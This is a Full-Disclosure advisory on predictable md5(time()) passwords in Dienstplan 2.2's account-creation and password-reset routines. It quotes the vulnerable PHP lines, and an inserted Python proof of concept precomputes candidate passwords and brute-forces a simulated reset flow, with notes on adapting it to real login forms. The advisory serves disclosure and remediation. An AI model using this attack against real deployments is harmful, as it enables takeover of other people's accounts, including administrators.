
List:       full-disclosure
Subject:    [Full-disclosure] Dienstplan 2.2 predictive password generation
From:       Dan Luedtke <maildanrl () googlemail ! com>
Date:       2011-08-29 7:23:27
Message-ID: CAAfuxnLJgZbeq1x-JUBvUBaGq0mxZ1H4B5nP-SM56zPv1gCHSA () mail ! gmail ! com

Discovered on Tue, 07 Jun 2011
by Dan Luedtke http://www.danrl.de

Abstract
========
The calendar application Dienstplan 2.2 generates predictable passwords in
its user-creation and password-reset routines: both derive the password
from the MD5 hash of the current UNIX timestamp.


About Dienstplan
================
Dienstplan is a web-based calendar application written in PHP, targeting
clubs and associations. Registered users may RSVP to scheduled events.
See http://www.thomas-gubisch.de/dienstplan.html for further
information.


Vulnerable Versions
===================
Tested on Dienstplan 2.2; other versions may also be vulnerable.


Predictable Password Generation (1/2)
=====================================
When a new account is created, the initial password is derived from PHP's
time() function, which returns the current UNIX timestamp (seconds since
the epoch, as an integer). The unsalted MD5 hash of that integer becomes
the initial password and stays valid until the user changes it manually.

--[ user_func.php lines 46-49 ]--
        // id = 0 -> new user
        if($id == 0)
                $id = master_addUser($username, $email, md5(time()));
        else
--

An attacker who knows roughly when an account was created can predict the
password: there is exactly one candidate per second of uncertainty, so
even a window of several hours is a small set to try.


Predictable Password Generation (2/2)
=====================================
A user can reset his own password. Unfortunately, anyone who can reach the
application in a browser can trigger this reset for any known username
(e.g. admin). The application then generates a new password as shown
below and mails it to the user it was generated for.

--[ user_func.php line 134 ]--
        $password = md5(time());
--

An attacker can predict the password, or a small set of possible
passwords, by precomputing the MD5 hashes of the UNIX timestamps around
the moment of the reset (e.g. +/-10 seconds; the width of the window
depends on the clock skew between attacker and server). He triggers the
password reset for the target user and then logs in with each precomputed
candidate until one is accepted.
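The attack described in sections 1/2 and 2/2 above, worked through as an added example that is not code from this advisory or from Dienstplan. It re-implements the md5(time()) generator the advisory quotes, precomputes the candidate set for a clock-skew window, and runs it against a constructed stand-in for the reset flow. The DienstplanModel class, its clock_offset parameter, the sample timestamps and secure_temporary_password() are all assumptions made for illustration; the real application's reset handler and the vendor's fix are not reproduced here.

```python
import hashlib
import secrets
from typing import Dict, Optional


def vulnerable_password(ts: int) -> str:
    """Replicates md5(time()) from user_func.php: PHP's time() is the integer
    UNIX timestamp, and md5() returns 32 lowercase hex characters."""
    return hashlib.md5(str(ts).encode("ascii")).hexdigest()


def candidate_passwords(ref_ts: int, skew: int) -> Dict[str, int]:
    """Precompute md5(ts) for every second in [ref_ts - skew, ref_ts + skew].

    Returns password -> timestamp, so a hit also reveals the server's clock
    offset. The window holds only 2*skew+1 candidates: even a one-hour window
    (useful for the account-creation case, where the time is only roughly
    known) costs 7201 MD5 computations.
    """
    return {vulnerable_password(ts): ts
            for ts in range(ref_ts - skew, ref_ts + skew + 1)}


class DienstplanModel:
    """Constructed stand-in for the reset flow (NOT the real application).

    clock_offset models the server clock running ahead of (positive) or
    behind (negative) the attacker's clock, in seconds.
    """

    def __init__(self, clock_offset: int) -> None:
        self.clock_offset = clock_offset
        self.passwords: Dict[str, str] = {}

    def reset_password(self, username: str, attacker_now: int) -> None:
        # Mirrors line 134 of user_func.php: $password = md5(time());
        # The real application mails this to the user; the attacker
        # never needs that mail.
        server_time = attacker_now + self.clock_offset
        self.passwords[username] = vulnerable_password(server_time)

    def login(self, username: str, password: str) -> bool:
        return self.passwords.get(username) == password


def attack(server: DienstplanModel, username: str,
           attacker_now: int, skew: int) -> Optional[int]:
    """Trigger the reset for `username`, noting the attacker's own clock, then
    try every candidate within `skew` seconds of it.

    Returns the server timestamp that produced the accepted password, or
    None if the skew window was too narrow to cover the server's clock.
    """
    server.reset_password(username, attacker_now)
    for password, ts in candidate_passwords(attacker_now, skew).items():
        if server.login(username, password):
            return ts
    return None


def secure_temporary_password(nbytes: int = 16) -> str:
    """Illustrative replacement (an assumption, not the vendor's actual fix):
    draw the temporary password from the OS CSPRNG instead of the clock, so
    knowing when it was generated tells the attacker nothing."""
    return secrets.token_urlsafe(nbytes)


if __name__ == "__main__":
    # Constructed scenario: server clock 7 s behind the attacker's.
    srv = DienstplanModel(clock_offset=-7)
    hit = attack(srv, "admin", attacker_now=1307433600, skew=10)
    print("recovered server timestamp:", hit)  # 1307433593
    print("random replacement:", secure_temporary_password())
```

A real run would replace DienstplanModel with an HTTP client that submits the reset form and then posts each candidate to the login form; the candidate dictionary is the same. Widening `skew` costs one MD5 per extra second, so the skew between attacker and server is never a practical obstacle.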


Remarks
=======
* The software author responded in less than 24h; a fix was provided soon
after that.
* Disclosure was delayed for 2+ months to give users time to update their
software.



regards,
   danrl


-- 
Dan Luedtke
http://www.danrl.de (private)
http://www.dlitc.com (company)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/